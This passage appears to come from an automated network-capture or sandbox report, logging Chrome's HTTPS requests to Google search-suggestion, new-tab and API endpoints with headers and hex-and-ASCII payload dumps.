                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC1390INData Raw: 61 6c 69 73 20 6e 6f 76 61 22 2c 22 64 65 6e 73 65 20 66 6f 67 20 6d 61 6b 69 6e 67 20 70 65 6f 70 6c 65 20 73 69 63 6b 22 2c 22 6a 65 6f 70 61 72 64 79 20 77 69 6e 6e 65 72 20 74 6f 64 61 79 22 2c 22 77 68 61 74 73 61 70 70 20 32 30 32 35 22 2c 22 61 6e 74 68 6f 6e 79 20 73 61 6e 74 61 6e 64 65 72 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67
                                                                                                                                                                                                                                                                                                                                    Data Ascii: alis nova","dense fog making people sick","jeopardy winner today","whatsapp 2025","anthony santander"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sugg
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC1007INData Raw: 68 77 51 32 31 68 53 31 5a 52 61 32 74 5a 54 7a 46 33 4e 46 4a 53 64 56 68 51 53 43 39 4a 4e 45 39 4c 61 47 56 72 4d 47 31 36 56 48 68 77 54 6b 35 76 4e 6d 46 6b 52 45 68 6c 57 46 56 7a 56 6e 4e 36 5a 6a 56 46 4d 48 46 4c 63 58 6c 6e 63 6e 6c 34 4e 45 70 56 4f 55 52 51 54 6c 64 78 4d 6d 70 4e 54 6e 5a 47 52 58 70 47 62 56 4a 42 63 46 6b 72 64 55 49 7a 56 56 4d 34 56 32 31 31 53 53 39 4a 5a 45 38 78 56 46 64 4a 63 45 56 6e 64 44 4a 58 54 30 38 7a 55 57 68 75 5a 44 4a 43 56 55 38 76 54 30 38 79 4e 45 45 76 63 58 4a 57 53 47 56 58 4f 47 68 33 63 33 46 6f 64 58 52 79 59 30 64 31 59 32 52 4d 4d 57 39 69 62 46 4e 69 59 56 64 49 5a 57 6c 70 61 58 52 43 61 30 4e 7a 5a 44 56 51 53 6d 74 34 64 30 31 47 55 48 45 79 54 33 45 79 56 58 4a 74 59 6d 46 79 55 30 68 75 63
                                                                                                                                                                                                                                                                                                                                    Data Ascii: hwQ21hS1ZRa2tZTzF3NFJSdVhQSC9JNE9LaGVrMG16VHhwTk5vNmFkREhlWFVzVnN6ZjVFMHFLcXlncnl4NEpVOURQTldxMmpNTnZGRXpGbVJBcFkrdUIzVVM4V211SS9JZE8xVFdJcEVndDJXT08zUWhuZDJCVU8vT08yNEEvcXJWSGVXOGh3c3FodXRyY0d1Y2RMMW9ibFNiYVdIZWlpaXRCa0NzZDVQSmt4d01GUHEyT3EyVXJtYmFyU0huc
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC179INData Raw: 61 64 0d 0a 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ad3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY"]}]
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    13192.168.2.550005142.250.186.1644436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:15 GMT
                                                                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC372INData Raw: 31 61 33 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1a31)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                                                    Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC781INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                    Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700243,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC389INData Raw: 31 37 65 0d 0a 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d 63 61 74 63
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 17eck\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}catc
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 38 30 30 30 0d 0a 7d 3b 5f 2e 44 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 43 64 28 5f 2e 68 64 2e 69 28 29 2c 61 29 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 47 64 3b 5f 2e 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8000};_.Dd\u003dfunction(a){return _.Cd(_.hd.i(),a)};\n}catch(e){_._DumpException(e)}\ntry{\n/*\n\n Copyright Google LLC\n SPDX-License-Identifier: Apache-2.0\n*/\nvar Gd;_.Ed\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 52 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 52 64 5c 75 30 30 33 64 51 64 28 29 29 3b 72 65 74 75 72 6e 20 52 64 7d 3b 5c 6e 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 53 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 54 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c
                                                                                                                                                                                                                                                                                                                                    Data Ascii: h(b){}return a};_.Sd\u003dfunction(){Rd\u003d\u003d\u003dvoid 0\u0026\u0026(Rd\u003dQd());return Rd};\n_.Ud\u003dfunction(a){const b\u003d_.Sd();return new _.Td(b?b.createScriptURL(a):a)};_.Vd\u003dfunction(a){if(a instanceof _.Td)return a.i;throw Error(\
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC1390INData Raw: 33 64 6e 65 77 20 66 65 29 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3dnew fe)};_.ie\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db||document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelect


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    14192.168.2.550004142.250.186.1644436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:15 GMT
                                                                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    15192.168.2.550013216.58.206.464436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:18 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: apis.google.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
